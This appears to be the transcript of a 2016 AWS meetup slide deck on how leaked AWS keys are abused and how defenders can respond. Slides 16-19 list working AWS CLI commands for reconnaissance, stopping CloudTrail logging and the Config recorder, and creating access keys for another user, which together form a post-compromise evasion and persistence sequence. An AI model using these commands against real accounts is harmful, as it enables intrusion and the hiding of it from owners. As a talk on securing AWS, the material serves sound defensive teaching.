Walkthrough of a compromised AWS Account - AWS Meetup Nov2016

Transcript

1. WALKTHROUGH OF A COMPROMISED AWS ACCOUNT AWS Melbourne Meetup 24

   Nov, 2016

2. WHO AM I • Ashish (@hashishrajan) • Security Architect +

   Consultant + Engineer at a startup called Versent • Versent – 7th in the list of fastest growing startup in Australia for 2016 (source: BRW Australia 2016 edition)

3. AGENDA • AWS Primer • How someone can get keys

   to an AWS Account • What I do with the keys • What can you do next

4. AWS PRIMER

5. AWS PRIMER Infrastructure as a Service (IaaS) Ø Root Account

   vs IAM Users vs IAM Roles Ø Key Pairs vs Access Keys Ø VPC vs EC2 Ø CloudTrail vs CloudWatch Ø KMS Ø S3 Buckets Ø Route53

6. AWS SECURITY

7. Image Courtesy: AWS

8. HOW WOULD SOMEONE GETS KEYS TO AN AWS ACCOUNT

9. KEYS IN THE WILD • Application Source Code • CI/CD

   systems • GitHub • Rogue AWS Accounts • Reddit • AWS Forum • Tech Forums • Social Engineering

10. LEGITIMATE WAY • Security Review of AWS Accounts for compliance

    checks • Organization’s AWS Expert • New AWS Account - 12month free tier

11. WHAT I DO NEXT

12. ATTACK VECTORS • AWS Console + IAM User • AWS

    Cli + Access Keys • SSH Keys + EC2 Instances • Snaphots + EC2 Instances • AWS Metadata Endpoint • Misconfiguration of AWS Resources

13. AWS CLI + ACCESS KEYS

14. WHAT DO WE HAVE Ø aws sts get-caller-identity Ø aws

    sts get-session-token --duration-seconds 129600
15. None

16. AWS CLOUDTRAIL:* Stop Footprint collection!! Ø aws cloudtrail describe-trails Ø

    aws cloudtrail stop-logging --name All Ø aws cloudtrail update-trail --name All --no-is-multi-region-trail --no- include-global-service-events Note: S3 Bucket Name

17. AWS IAM:* What kind of account do I have? •

    aws iam get-account-summary • aws iam list-users | grep ashish • aws iam get-credential-report | jq -r '.Content' | base64 --decode > output.csv • aws iam create-access-key --user-name captain.america • aws sts get-session-token --duration-seconds 129600 • aws iam list-roles | jq '.Roles[] .RoleName'

18. AWS ROUTE53:* • aws route53 list-hosted-zones | jq • aws

    route53 list-resource-record-sets --hosted-zone-id /hostedzone/ABCD | jq '.ResourceRecordSets[] | .Name' • Google search keyword: site:sitename.com.au

19. AWS CONFIGSERVICE:* • aws configservice get-status • aws configservice describe-configuration-recorder-status

    • aws configservice stop-configuration-recorder --configuration-recorder-name <recorder-name>

20. AWS EC2:* • EC2 Instances - Bastion • Elastic IPs:

    - PublicIp • Security Groups • Key Pair • Route Tables • VPC Endpoints • VPC Peering • Snapshots
21. None
22. None

23. AWS S3:* • Source code • Paid software • Startup

    Script • CloudTrail • Website Code

24. WHAT CAN YOU DO NEXT

25. WHAT SHOULD YOU DO

26. THERE IS HOPE • Reactive AWS Environment • AWS Services

    – already solving the problem • Logging – AWS CloudTrail, AWS Cloud Watch • Baseline Config Management - AWS Cloud Config • Trigger actions on events • IAM Roles + Policies • AWS CloudFormation as much as possible

27. EVENT DRIVEN SECURITY Source: FireEye 2016 Report

28. ~FIN~ You can talk nerdy to me: • @hashishrajan •

    https://au.linkedin.com/in/ashishrajan